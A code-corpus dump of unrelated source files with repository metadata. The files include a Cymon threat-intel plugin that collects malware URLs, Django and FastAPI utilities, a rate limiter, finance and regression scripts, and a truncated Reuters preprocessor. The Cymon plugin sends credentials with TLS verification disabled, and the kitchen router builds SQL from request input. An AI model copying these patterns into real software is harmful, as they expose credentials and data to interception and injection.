"line_number": 21,
"usage_type": "name"
},
{
"api_name": "django.contrib.messages.add_message",
"line_number": 23,
"usage_type": "call"
},
{
"api... |
451100359 | #!/usr/bin/python3
from __future__ import division
from core.class_utils import MalwareUrl
from core.config_utils import get_base_config
from datetime import datetime, timedelta
from core.dns_utils import resolve_dns
from core.log_utils import get_module_logger
from core.virus_total import get_urls_for_ip
import dateutil.parser
import json
import math
import os
import requests
import sys
import time
# Resolve the project root relative to this module so config and logging
# work regardless of the current working directory.
CDIR = os.path.dirname(os.path.realpath(__file__))
ROOTDIR = os.path.abspath(os.path.join(CDIR, os.pardir))
BASECONFIG = get_base_config(ROOTDIR)
LOGGING = get_module_logger(__name__)
TYPES = ['malware-url']
NAME = 'Cymon'
DISABLED = False
# SECURITY NOTE(review): credentials are hard-coded placeholders; they
# should come from configuration or the environment, not source.
CYMON_USER = 'YOUR USERNAME'
CYMON_PASS = 'YOUR PASSWORD'
BATCH_SIZE = 100
# AVsGgRbdVjrVcoBZyoid: Abuse.ch Ransomware Tracker
# AVsGgNL4VjrVcoBZyoib: Abuse.ch Zeus Tracker
# AVvtZm8i2c0QRQctzx4f: Bambenek Consulting C2
# AVsIOKQlVjrVcoBZyojw: Cyber Crime Tracker
# AVsGX4iNVjrVcoBZyoiH: Malc0de
# AVsGXy7tVjrVcoBZyoiB: URLVir
# AVsGgHxAVjrVcoBZyoiX: VX Vault
# NOTE(review): FEED_LIST contains 6 ids but 7 are described above; the
# Cyber Crime Tracker id (AVsIOKQlVjrVcoBZyojw) is absent -- confirm
# whether that omission is intentional.
FEED_LIST = ['AVsGgRbdVjrVcoBZyoid', 'AVsGgNL4VjrVcoBZyoib', 'AVvtZm8i2c0QRQctzx4f', 'AVsGX4iNVjrVcoBZyoiH', 'AVsGXy7tVjrVcoBZyoiB', 'AVsGgHxAVjrVcoBZyoiX']
def cymon_auth():
    """Authenticate against the Cymon API.

    Returns:
        - result: (type: string) Cymon JWT token, or False on any failure.
    """
    payload = {
        'username': CYMON_USER,
        'password': CYMON_PASS}
    headers = {'Content-Type': 'application/json'}
    LOGGING.info('Authenticating against Cymon API...')
    try:
        # SECURITY: verify=False disables TLS certificate validation and
        # exposes the credentials to interception -- review before use.
        response = requests.post(
            'https://api.cymon.io/v2/auth/login',
            data=json.dumps(payload),
            headers=headers,
            verify=False)
        if response.status_code == 200:
            LOGGING.info('Authentication successful!')
            # response.json() replaces json.loads(response.text).
            return response.json()['jwt']
        LOGGING.error(
            'Problem connecting to Cymon. Status code:{0}. Please try again later.'.format(
                response.status_code))
    except requests.exceptions.ConnectionError as e:
        LOGGING.warning('Problem connecting to Cymon. Error: {0}'.format(e))
    except Exception as e:
        # Last-resort guard so a feed failure never kills the scheduler;
        # logger.exception records the full traceback in one call.
        LOGGING.warning('Problem connecting to Cymon. Aborting task.')
        LOGGING.exception(e)
    return False
def get_cymon_feed_size(jwt, feed_id):
    """Determine the number of results a feed will return (max: 1000).

    Only entries within the last BASECONFIG.malware_days days count.
    Params:
    - jwt: (type: string) JWT token.
    - feed_id: (type: string) Cymon feed ID.
    Returns:
    - total: (type: int) feed size; 0 on any failure.
    """
    try:
        today = datetime.utcnow()
        threshold = today - timedelta(days=BASECONFIG.malware_days)
        headers = {'Authorization': 'Bearer {0}'.format(jwt)}
        # size=1: only the 'total' field is needed, not the hits.
        payload = {
            'startDate': threshold.strftime('%Y-%m-%d'),
            'endDate': today.strftime('%Y-%m-%d'),
            'size': 1}
        LOGGING.info('Determining feed size...')
        request = requests.get(
            'https://api.cymon.io/v2/ioc/search/feed/{0}'.format(feed_id),
            params=payload,
            headers=headers,
            verify=False)
        if request.status_code == 200:
            LOGGING.info('Request successful!')
            response = json.loads(request.text)
            if 'total' in response:
                total = int(response['total'])
                # The search API serves at most 1000 results per query.
                if total > 1000:
                    LOGGING.warning(
                        'API request returned more than 1000 results.')
                    total = 1000
                return total
        else:
            LOGGING.error(
                'Problem connecting to Cymon. Status code:{0}. Please try again later.'.format(
                    request.status_code))
    except requests.exceptions.ConnectionError as e:
        LOGGING.warning('Problem connecting to Cymon. Error: {0}'.format(e))
    except Exception as e:
        LOGGING.warning('Problem connecting to Cymon. Aborting task.')
        LOGGING.exception(sys.exc_info())
        LOGGING.exception(type(e))
        LOGGING.exception(e.args)
        LOGGING.exception(e)
    return 0
def get_cymon_feed(jwt, feed_id, pages):
    """Produce a list of URLs for IPs found in the feed.

    Pages through the feed collecting unique IPs (hostnames are first
    resolved via resolve_dns), then expands each IP into known malware
    URLs via get_urls_for_ip.
    Params:
    - jwt: (type: string) JWT token.
    - feed_id: (type: string) Cymon feed ID.
    - pages: (type: int) number of pages to retrieve.
    Returns:
    - url_list: (type: MalwareUrl list) list of malware URLs; [] on
      failure or when no hosts were of interest.
    """
    try:
        today = datetime.utcnow()
        threshold = today - timedelta(days=BASECONFIG.malware_days)
        headers = {'Authorization': 'Bearer {0}'.format(jwt)}
        LOGGING.info('Fetching data from Cymon feed: {0}'.format(feed_id))
        ip_list = []
        for n in range(1, pages + 1):
            # 'from' is the zero-based offset of page n.
            payload = {
                'startDate': threshold.strftime('%Y-%m-%d'),
                'endDate': today.strftime('%Y-%m-%d'),
                'size': BATCH_SIZE,
                'from': (
                    BATCH_SIZE *
                    n -
                    BATCH_SIZE)}
            request = requests.get(
                'https://api.cymon.io/v2/ioc/search/feed/{0}'.format(feed_id),
                params=payload,
                headers=headers,
                verify=False)
            if request.status_code == 200:
                LOGGING.info('Request successful!')
                response = json.loads(request.text)
                if 'hits' in response:
                    for feed_entry in response['hits']:
                        if 'ioc' in feed_entry:
                            # Prefer a literal IP; otherwise resolve the hostname.
                            if 'ip' in feed_entry['ioc']:
                                mal_ip = feed_entry['ioc']['ip']
                                if mal_ip not in ip_list:
                                    ip_list.append(mal_ip)
                            elif 'hostname' in feed_entry['ioc']:
                                host_name = feed_entry['ioc']['hostname']
                                mal_ip = resolve_dns(host_name)
                                if mal_ip:
                                    if mal_ip not in ip_list:
                                        ip_list.append(mal_ip)
            else:
                LOGGING.error(
                    'Problem connecting to Cymon. Status code:{0}. Please try again later.'.format(
                        request.status_code))
        if len(ip_list) > 0:
            # Expand each unique IP into its known malware URLs.
            url_list = []
            for ip_addr in ip_list:
                ip_results = get_urls_for_ip(ip_addr, NAME)
                if len(ip_results) > 0:
                    url_list.extend(ip_results)
            return url_list
        else:
            LOGGING.warning('No hosts of interest.')
    except requests.exceptions.ConnectionError as e:
        LOGGING.warning('Problem connecting to Cymon. Error: {0}'.format(e))
    except Exception as e:
        LOGGING.warning('Problem connecting to Cymon. Aborting task.')
        LOGGING.exception(sys.exc_info())
        LOGGING.exception(type(e))
        LOGGING.exception(e.args)
        LOGGING.exception(e)
    return []
def get_malwareurl_list():
    """Produce a list of malware URLs from Cymon feeds.

    Authenticates once, sizes each feed in FEED_LIST to work out how
    many result pages to fetch, then aggregates the URLs from every
    feed.

    Returns:
    - return_list: (type: MalwareUrl list) list of malware URLs; []
      when authentication fails or no feed yields results.
    """
    jwt = cymon_auth()
    if not jwt:
        LOGGING.warning('No Cymon authentication token. Cannot query API.')
        return []
    return_list = []
    for feed in FEED_LIST:
        LOGGING.info('Processing feed: {0}'.format(feed))
        feed_size = get_cymon_feed_size(jwt, feed)
        if feed_size > 0:
            # Integer ceiling division: the old math.ceil(a / b) relied
            # on true division (and would silently floor under Python 2).
            # Always fetch at least one page for a non-empty feed.
            pages = max(1, -(-feed_size // BATCH_SIZE))
            url_list = get_cymon_feed(jwt, feed, pages)
            if url_list:
                return_list.extend(url_list)
    # Return only after every feed has been processed.
    return return_list
| phage-nz/ph0neutria | core/plugins/cymon.py | cymon.py | py | 8,062 | python | en | code | 299 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "os.path.realpath",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "os.path.abspath",
"... |
71104422184 | #!/usr/bin/env python
# -*- coding=UTF-8 -*-
# Created at Mar 20 19:50 by BlahGeek@Gmail.com
import sys
# Python 2 only: force UTF-8 so the Chinese UI strings below encode
# correctly. hasattr guard makes this a no-op where the function is
# absent (Python 3).
if hasattr(sys, 'setdefaultencoding'):
    sys.setdefaultencoding('UTF-8')
import logging
from datetime import datetime, timedelta
from treehole.renren import RenRen
import os
from treehole.models import ContentModel, BlockIpModel
from ipaddr import IPNetwork, IPAddress
def needRecaptchar(addr, content):
    """Return True when IP `addr` has posted more than 2 statuses in
    the last 24 hours and should therefore solve a captcha.

    `content` is accepted but currently unused.
    """
    if ContentModel.objects.filter(
            ip=addr,
            time__range=(datetime.now()-timedelta(hours=24), \
                datetime.now())
            ).count() > 2:
        return True
    return False
def checkIP(addr):
    """Return True when `addr` may post: it must not be blacklisted and
    must fall inside one of the campus or private networks below."""
    allowed_networks = (
        IPNetwork('59.66.0.0/16'),
        IPNetwork('166.111.0.0/16'),
        IPNetwork('101.5.0.0/16'),
        IPNetwork('219.223.160.0/19'),
        # private address
        IPNetwork('127.0.0.0/8'),
        IPNetwork('10.0.0.0/8'),
        IPNetwork('192.168.0.0/16'),
    )
    if BlockIpModel.objects.filter(ip=addr).count() > 0:
        return False
    ip = IPAddress(addr)
    return any([ip in network for network in allowed_networks])
def postRawStatu(text):
    """ Post status without number, without saving to db"""
    # Delegates straight to the RenRen client; no local persistence.
    r = RenRen()
    r.postStatus(text)
def postStatu(text, ipaddr='127.0.0.1'):
    """ Post status, start with '#xxx', saving to db"""
    new_content = ContentModel(ip=ipaddr,
                               time=datetime.now(),
                               content=text)
    new_content.save()
    # NOTE(review): numbering by total row count races with concurrent
    # posts and breaks if rows are deleted — confirm acceptable.
    number = ContentModel.objects.count()
    text = '#' + str(number) + ' ' + text
    postRawStatu(text)
# User-facing (Chinese) status messages keyed by result code.
MSG = {
    'IP_NOT_VALID': '不允许您的IP发布',
    'CONTENT_TOO_LONG': '状态长度应该在6-100字之间',
    'TOO_MANY_TIMES': '每个IP相邻发布时间不能小于30分钟',
    'PUBLISH_ERROR': '服务器错误,发布失败',
    'RECAPTCHA_INCORRECT': '验证码错误',
    'RECAPTCHA_NEEDED': '请输入验证码',
    'PUBLISH_OK': '发布成功!'}
# Colour pairs (base shade, darker shade) for the frontend.
COLORS = [
    ('#1abc9c', '#16a085'),
    ('#2ecc71', '#27ae60'),
    ('#3498DB', '#2980B9'),
    ('#9B59B6', '#8E44AD'),
    ('#34495E', '#2C3E50'),
    ('#F1C40F', '#F39C12'),
    ('#E67E22', '#D35400'),
    ('#E74C3C', '#C0392B'),
    ('#95A5A6', '#7F8C8D')
]
| blahgeek/treehole | treehole/utils.py | utils.py | py | 2,317 | python | en | code | 30 | github-code | 36 | [
{
"api_name": "sys.setdefaultencoding",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "treehole.models.ContentModel.objects.filter",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "treehole.models.ContentModel.objects",
"line_number": 17,
"usage_type":... |
13070318133 | import time, collections
class RateLimiter:
    """Sliding-window rate limiter: each id may make at most
    `max_number` calls within any `interval`-second window."""

    def __init__(self, max_number, interval):
        # Per-id deque of timestamps for the most recent accepted calls.
        self.timeStamp = collections.defaultdict(collections.deque)
        self.interval = interval
        self.max_number = max_number

    def call(self, id):
        """Record an attempted call for `id`; return True if allowed."""
        now = time.time()
        window = self.timeStamp[id]
        if len(window) < self.max_number:
            window.append(now)
            return True
        # Window is full: allow only if the oldest accepted call has
        # aged out of the interval.
        if now - window[0] > self.interval:
            window.popleft()
            window.append(now)
            return True
        return False
# Demo: id 1 is limited to 5 calls per 2-second window; the printed
# booleans show which of the 10 one-per-second calls are admitted.
rateLimiter = RateLimiter(5, 2)
for i in range(10):
    print(rateLimiter.call(1))
    time.sleep(1)
# id 2 has its own independent window, so its first 5 calls all pass.
for i in range(5):
    print(rateLimiter.call(2))
| Jason003/Interview_Code_Python | stripe/rate limiter.py | rate limiter.py | py | 813 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "collections.defaultdict",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "collections.deque",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "time.time",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "time.sleep",
... |
9385088011 | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 27 01:30:02 2022
@author: Syeda Fatima Zahid
"""
import time
import datetime
import pandas as pd
# Download one month of daily MSFT quotes from Yahoo Finance's CSV
# export endpoint and save them locally.
ticker = 'MSFT'
# Yahoo expects the date range as Unix timestamps.
period1 = int(time.mktime(datetime.datetime(2020, 12, 1, 23, 59).timetuple()))
period2 = int(time.mktime(datetime.datetime(2020, 12, 31, 23, 59).timetuple()))
interval = '1d' # 1d, 1m
url = f'https://query1.finance.yahoo.com/v7/finance/download/{ticker}?period1={period1}&period2={period2}&interval={interval}&events=history&includeAdjustedClose=true'
data = pd.read_csv(url)
print(data)
data.to_csv('MSFT.csv')
{
"api_name": "time.mktime",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "time.mktime",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"li... |
41614185208 | from django.shortcuts import HttpResponseRedirect
from django.http import JsonResponse
from urllib.parse import quote
class AuthRequiredMiddleware(object):
    """Django middleware that forces authentication for every view
    except the login page.

    Unauthenticated AJAX requests receive a 403 JSON payload; regular
    requests are redirected to /login/ with a `next` parameter.
    """

    def __init__(self, get_response):
        self.get_response = get_response

    def __call__(self, request):
        # Runs for each request before the view (and later middleware).
        needs_login = (not request.user.is_authenticated
                       and request.path != "/login/")
        if needs_login:
            is_ajax = request.headers.get("x-requested-with") == "XMLHttpRequest"
            if is_ajax:
                payload = {
                    "status": "false",
                    "message": "You don't have permission to access this resource",
                }
                return JsonResponse(payload, status=403)
            next_url = quote(request.get_full_path())
            return HttpResponseRedirect(f"/login/?next={next_url}")
        # Runs for each request/response after the view is called.
        return self.get_response(request)
| comiconomenclaturist/django-icecast-stats | stats/middleware.py | middleware.py | py | 1,051 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "django.http.JsonResponse",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "urllib.parse.quote",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.HttpResponseRedirect",
"line_number": 22,
"usage_type": "call"
}
] |
36255089286 | import setuptools
# Distribution metadata for the `oka` client package.
NAME = "oka"
VERSION = "0.2108.0"
AUTHOR = 'Rafael A. Bizao, Davi P. dos Santos'
AUTHOR_EMAIL = 'rabizao@gmail.com'
DESCRIPTION = 'Python client for oka'
# The PyPI long description comes straight from the README.
with open('README.md', 'r') as fh:
    LONG_DESCRIPTION = fh.read()
LICENSE = 'GPL3'
# NOTE(review): URL/DOWNLOAD_URL point at davips/lange while
# project_urls point at rabizao/oka — confirm which is intended.
URL = 'https://github.com/davips/lange'
DOWNLOAD_URL = 'https://github.com/davips/lange/releases'
CLASSIFIERS = [
    'Development Status :: 3 - Alpha',
    'Intended Audience :: Developers',
    'Topic :: Software Development :: Build Tools',
    'License :: OSI Approved :: GNU General Public License (GPL)',
    'Programming Language :: Python :: 3',
    'Programming Language :: Python :: 3.7',
    'Programming Language :: Python :: 3.8',
    'Programming Language :: Python :: 3 :: Only',
]
INSTALL_REQUIRES = [
    'requests', 'python-dotenv', 'idict'
]
EXTRAS_REQUIRE = {
    'dev': ['check-manifest'],
    'test': ['coverage'],
}
SETUP_REQUIRES = ['wheel']
setuptools.setup(
    name=NAME,
    version=VERSION,
    author=AUTHOR,
    author_email=AUTHOR_EMAIL,
    classifiers=CLASSIFIERS,
    description=DESCRIPTION,
    download_url=DOWNLOAD_URL,
    extras_require=EXTRAS_REQUIRE,
    install_requires=INSTALL_REQUIRES,
    long_description=LONG_DESCRIPTION,
    long_description_content_type="text/markdown",
    license=LICENSE,
    packages=setuptools.find_packages(),
    setup_requires=SETUP_REQUIRES,
    url=URL,
    keywords='data, repository, archive, data science, machine learning',  # Optional
    project_urls={  # Optional
        'Bug Reports': 'https://github.com/rabizao/oka/issues',
        'Source': 'https://github.com/rabizao/oka',
    },
)
package_dir = {'': '.'}  # For IDEs like Intellij to recognize the package.
{
"api_name": "setuptools.setup",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "setuptools.find_packages",
"line_number": 58,
"usage_type": "call"
}
] |
13782320879 | from fastapi import APIRouter
from conn import conn
from model.kitchen import Kitchen
kitchen_router = APIRouter(
prefix="/kitchen",
tags=["kitchen"],
)
@kitchen_router.get("/")
async def read_items(attr: list, where: dict):
    """SELECT the `attr` columns from kitchen rows matching `where`."""
    cursor = conn.cursor()
    # NOTE(review): Kitchen.querySql interpolates attr/where into SQL —
    # verify it escapes values (injection risk). The cursor is also
    # never explicitly closed.
    sql = Kitchen.querySql(attr=attr, where=where)
    cursor.execute(sql)
    lines = cursor.fetchall()
    return {'values': lines}
@kitchen_router.post("/")
async def insert_item(kitchen: Kitchen):
    """INSERT the posted kitchen record and commit the transaction."""
    cursor = conn.cursor()
    sql = kitchen.insertSql()
    cursor.execute(sql)
    conn.commit()
    return {'added':kitchen}
@kitchen_router.delete("/")
async def delete_item(where: dict):
    """DELETE kitchen rows matching the `where` map and commit."""
    cursor = conn.cursor()
    sql = Kitchen.deleteSql(where=where)
    cursor.execute(sql)
    conn.commit()
    return {'deleted': where}
@kitchen_router.put("/")
async def update_items(attrDict: dict, where: dict):
    """UPDATE rows matching `where` with the values in `attrDict`; commits."""
    cursor = conn.cursor()
    sql = Kitchen.updateSql(where=where, attrDict=attrDict)
    cursor.execute(sql)
    conn.commit()
    return {'updated': attrDict, 'where': where}
| JulioHey/Banco-de-Dados---EP | server/router/kitchen.py | kitchen.py | py | 1,060 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "fastapi.APIRouter",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "conn.conn.cursor",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "conn.conn",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "model.kitchen.Kitchen.que... |
36899051077 | import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
import math
import matplotlib.animation as animation
from mpl_toolkits.mplot3d import Axes3D
from mpl_toolkits.mplot3d import Axes3D
# Global variables populated by gradient_descent() and reused by the
# plotting code below: iteration count, theta trajectory, cost history.
num_iter=0
saved_theta=np.zeros((2, 1))
cost=np.zeros(1)
def h(X, theta):
    """Hypothesis function: return the linear predictions X . theta."""
    predictions = np.dot(X, theta)
    return predictions
def Jtheta(X, Y, theta):
    """Least-squares cost: half the sum of squared residuals."""
    residuals = h(X, theta) - Y
    return 0.5 * np.sum(residuals ** 2)
def linear_prediction(x, theta):
    """Evaluate the fitted line theta[0] + theta[1] * x at x."""
    intercept = theta[0]
    slope = theta[1]
    return intercept + slope * x
def normal(X, Y):
    """Closed-form least-squares solution: (X^T X)^-1 X^T Y."""
    gram = np.dot(X.T, X)
    moment = np.dot(X.T, Y)
    return np.dot(np.linalg.inv(gram), moment)
def gradient_descent(X, Y, alpha, theta_in):
    """Batch gradient descent for linear regression.

    Iterates until the cost improvement drops below 1e-15, recording
    every intermediate theta and cost in the module-level globals
    `saved_theta`, `cost` and `num_iter` (used later for plotting).

    X: design matrix with bias column; Y: target column vector;
    alpha: learning rate; theta_in: initial parameter column vector.
    Returns the converged theta.
    """
    i=0
    epsilon=1e-15
    theta=theta_in;
    global saved_theta
    global num_iter
    global cost
    saved_theta=theta_in
    J=Jtheta(X, Y, theta)
    cost=J
    while (True):
        Jprev=Jtheta(X, Y, theta)
        # Gradient step: theta += alpha * X^T (Y - X theta)
        theta_new= theta + (alpha)*np.dot(X.T, (Y-h(X, theta)))
        Jnew=Jtheta(X, Y, theta_new)
        # Converged when the cost change is negligible.
        if math.fabs(Jnew-Jprev)<epsilon:
            break
        theta=theta_new
        # Keep the optimisation trajectory for later visualisation.
        saved_theta=np.hstack((saved_theta, theta))
        cost=np.vstack((cost, Jnew))
        i=i+1
    num_iter=i
    print('Number of iterations', i)
    return theta
# Load the raw data; ytemp gains a second axis so it acts as a 1xN matrix.
Xtemp = np.loadtxt('linearX.csv', delimiter=',') #array of X
ytemp = np.loadtxt('linearY.csv', delimiter=',')[np.newaxis] #converting 1d array into 2d matrix using np.newaxis
ones = np.ones(len(Xtemp))
#Normalizing the data (zero mean, unit variance)
mean = np.mean(Xtemp)
sigma = np.std(Xtemp)
Xtemp = (Xtemp - mean)/sigma
# Prepend a bias column of ones, then shape into (n_samples, 2)/(n_samples, 1).
Xtemp1 = np.vstack((ones, Xtemp))
X=Xtemp1.T.copy() #taking transpose of X
Y=ytemp.T.copy() #taking transpose of Y
alpha=0.0001
theta=[[0.], [0.]]
#part a: fit by gradient descent and compare with the closed-form solution
theta_optimal=gradient_descent(X, Y, alpha, theta)
print('Optimal value of theta', theta_optimal)
print('Analytical solution is', normal(X, Y))
#part b: scatter the data and overlay the fitted line
plt.plot(Xtemp, Y, 'ro')
plt.plot(Xtemp, np.dot(X, theta_optimal))
plt.xlabel('Aciditiy')
plt.ylabel('Density')
plt.show()
def createJ_plot(Theta_0, Theta_1):
    """Cost-surface value J(theta0, theta1) over the global X, Y data
    (note: normalised by 2*n, unlike Jtheta above)."""
    Theta = np.matrix([[Theta_0], [Theta_1]])
    return ((Y - X * Theta).T * (Y - X * Theta) / (2*X.shape[0])).item(0)
#part c: 3D mesh of the cost surface over a grid of (theta0, theta1)
fig=plt.figure()
ax = fig.add_subplot(111, projection='3d')
theta_0_plot=np.arange(-4, 4, 0.05)[np.newaxis]
theta_1_plot=np.arange(-1, 1, 0.002)[np.newaxis] #Make it 4
theta_0_plot, theta_1_plot=np.meshgrid(theta_0_plot, theta_1_plot)
# Evaluate J over the whole grid; vectorize maps the scalar helper.
J_plot=np.vectorize(createJ_plot)(theta_0_plot, theta_1_plot)
ax.plot_surface(theta_0_plot, theta_1_plot, J_plot, cmap=plt.cm.jet, rstride=1, cstride=1, linewidth=0)
plt.show()
| ashishgupta97/Machine-Learning | LinearRegression.py | LinearRegression.py | py | 2,417 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.dot",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 16,
... |
31410757057 | from django.db import models
from django.contrib.auth import get_user_model
# Create your models here.
class MailList(models.Model):
    """
    database table that stores all
    users that subscribe to recieve notifications
    """
    # One row per user; both flags default to subscribed. (Field names
    # keep the historical 'recieve' spelling: renaming them would
    # require a schema migration.)
    user = models.ForeignKey(get_user_model(), on_delete=models.CASCADE)
    recieve_email_notifications = models.BooleanField(default=True)
    recieve_push_notifications = models.BooleanField(default=True)

    @classmethod
    def did_subscribe_for_email_notifications(cls, user):
        """
        check if a particular user is
        subscribed to recieve email notifications
        """
        # get_or_create returns (instance, created); a missing row is
        # created with the subscribed-by-default flags.
        result = MailList.objects.get_or_create(user=user)
        return result[0].recieve_email_notifications

    @classmethod
    def did_subscribe_for_push_notifications(cls, user):
        """
        check if a particular user is
        subscribed to recieve push notifications
        """
        result = MailList.objects.get_or_create(user=user)
        return result[0].recieve_push_notifications
| andela/ah-backend-valkyrie | authors/apps/notify/models.py | models.py | py | 1,042 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.db.models.Model",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "django.db.models",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "django.db.models.ForeignKey",
"line_number": 11,
"usage_type": "call"
},
{
"api_name":... |
16117948354 | import os
from builtins import classmethod, int
from datetime import datetime
from models.country import Country
from es import es
class State:
    """Elasticsearch-backed CRUD helpers for `state` documents.

    States are child documents (parent = country id) in the index named
    by the INDEX environment variable.
    """
    def __init__(self):
        pass

    @classmethod
    def list(cls, country):
        """Return all states, optionally filtered by country name."""
        if country != "":
            state_data = es.search(
                index=os.environ.get("INDEX"),
                body={
                    'size': 10000,
                    'query': {"bool": {"must": [{"match": {"_type": "state"}}, {"match": {"country": country}}]}}
                },
                filter_path=['hits.hits._id', 'hits.hits._source', 'hits.hits._parent']
            )
        else:
            state_data = es.search(
                index=os.environ.get("INDEX"),
                body={
                    'size': 10000,
                    'query': {"match": {"_type": "state"}}
                },
                filter_path=['hits.hits._id', 'hits.hits._source', 'hits.hits._parent']
            )
        states = []
        if 'hits' in state_data and 'hits' in state_data['hits']:
            # Display name is "name - parent"; hits without a parent are skipped.
            states = [
                {"id": data["_id"], "name": data["_source"]["name"]+" - "+data["_parent"], "parent": data["_parent"],
                 "country": data["_source"]["country"]}
                for data in state_data['hits']['hits']
                if "_parent" in data
            ]
        return states

    @classmethod
    def get(cls, id):
        """Fetch a single state by document id; False when not found."""
        state_data = es.search(index=os.environ.get("INDEX"),
                               body={'query': {"bool": {"must": [{"match": {"_type": "state"}},
                                                                 {'match': {'_id': id}},
                                                                 ]}}})
        if 'hits' in state_data and 'hits' in state_data['hits']:
            return {"id": state_data['hits']['hits'][0]['_id'],
                    "name": state_data['hits']['hits'][0]["_source"]["name"],
                    "parent": state_data['hits']['hits'][0]["_parent"],
                    "country": state_data['hits']['hits'][0]["_source"]["country"]}
        return False

    @classmethod
    def create(cls, name, country):
        """Index a new state under `country`; True on success."""
        country_rec = Country.get(country)
        if country_rec:
            # Millisecond timestamp doubles as the document id.
            id = int(datetime.timestamp(datetime.now()) * 1000)
            body = {"name": name, "country": country_rec["name"]}
            res = es.index(index=os.environ.get("INDEX"), doc_type='state', id=id, parent=country_rec["id"], body=body)
            if "created" in res and res["created"]:
                return True
        return False

    @classmethod
    def edit(cls, id, name, country):
        """Re-index (overwrite) state `id` with new values; True on success."""
        country_rec = Country.get(country)
        if country_rec:
            res = es.index(index=os.environ.get("INDEX"), doc_type='state', id=id, parent=country_rec["id"],
                           body={"name": name, "country": country_rec["name"]})
            if "result" in res and res["result"] == "updated":
                return True
        return False

    @classmethod
    def delete(cls, id, country):
        """Delete state `id` (child of `country`); True on success."""
        state_rec = State.get(id)
        if state_rec:
            res = es.delete(index=os.environ.get("INDEX"), doc_type='state', id=id, parent=country)
            if "found" in res and res["found"] and "result" in res and res["result"] == "deleted":
                return True
        return False
| RakeshMallesh123/flask-elasticsearch | models/state.py | state.py | py | 3,380 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "es.es.search",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "es.es",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "os.environ.get",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 18,... |
31282026948 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import tensorflow as tf
from bs4 import BeautifulSoup
from pagi.utils.embedding import Embedding
def main(args):
    """Convert Reuters-21578 SGML articles into a PTB-style text corpus.

    args: [script, input_sgm_path, output_txt_path]. Each article body
    is tokenised and normalised to PTB conventions (lowercase, 'N' for
    numbers, '<unk>' for out-of-embedding words, clitics split off,
    one sentence per line); the result is appended to the output file.
    """
    print("Args:", args)
    # data_dir = '/home/dave/agi/ptb_err'
    # count_file = 'error_count.csv'
    # dist_file = 'error_hist.csv'
    embedding_file = './ptb_embedding.txt'
    #input_file = '/home/dave/agi/reuters_news/reuters21578/reut2-000.sgm'
    #output_file = 'reuters.txt'
    input_file = args[1]
    output_file = args[2]
    # The embedding vocabulary decides which tokens become '<unk>'.
    e = Embedding()
    e.clear()
    e.read(embedding_file)
    f = open(input_file, 'r')
    data = f.read()
    #print( 'data: ', data)
    # Must replace body with content tags, for reasons
    # See: https://stackoverflow.com/questions/15863751/extracting-body-tags-from-smg-file-beautiful-soup-and-python
    data_replaced = data.replace('<BODY>', '<content>')
    data_replaced = data_replaced.replace('</BODY>', '</content>')
    # Parse the modified content
    tag = 'content'
    unknown_token = '<unk>'
    number_token = 'N'
    num_footer_tags = 2  # Reuters always has a footer at the end
    # https://www.crummy.com/software/BeautifulSoup/bs4/doc/#contents-and-children
    soup = BeautifulSoup(data_replaced)
    articles = soup.findAll(tag)  # find all body tags
    print('Have ', len(articles), ' articles.')  # print number of body tags in sgm file
    i = 0
    corpus = ''
    # Loop through each body tag and print its content
    for article in articles:  # pylint: disable=too-many-nested-blocks
        content = article.contents
        if i < 10:
            print('Article: ', content)
            print('| ')
        output = ''
        output_list = []
        tokens = content[0].split()  # on whitespace
        num_tokens = len(tokens)
        # Skip the trailing footer tokens of every article.
        for j in range(num_tokens-num_footer_tags):
            input_token = tokens[j]
            token = input_token.strip()
            # force lowercase
            token = token.lower()
            # remove ALL commas (there are none in PTB)
            #token = token.replace('\n', ' ')
            # remove ALL commas (there are none in PTB)
            token = token.replace(',', '')
            # normalise Reuters abbreviations to PTB vocabulary:
            # replace dlrs with $
            token = token.replace('dlrs', '$')
            token = token.replace('dlr', '$')
            # replace mln
            token = token.replace('mln', 'million')
            token = token.replace('bln', 'billion')
            token = token.replace('trn', 'trillion')
            # replace tonnes
            token = token.replace('tonnes', 'tons')
            # replace pct with percent
            token = token.replace('pct', 'percent')
            # remove trailing periods (and remember sentence boundaries)
            end_of_sentence = False
            if token.endswith('.'):
                end_of_sentence = True
                token = token[:-1]
            # replace the angle brackets around proper nouns
            token = token.replace('<', '')
            token = token.replace('>', '')
            # replace numbers with N
            try:
                float(token)
                token = number_token
            except ValueError:
                pass
            # https://stackoverflow.com/questions/5917082/regular-expression-to-match-numbers-with-or-without-commas-and-decimals-in-text
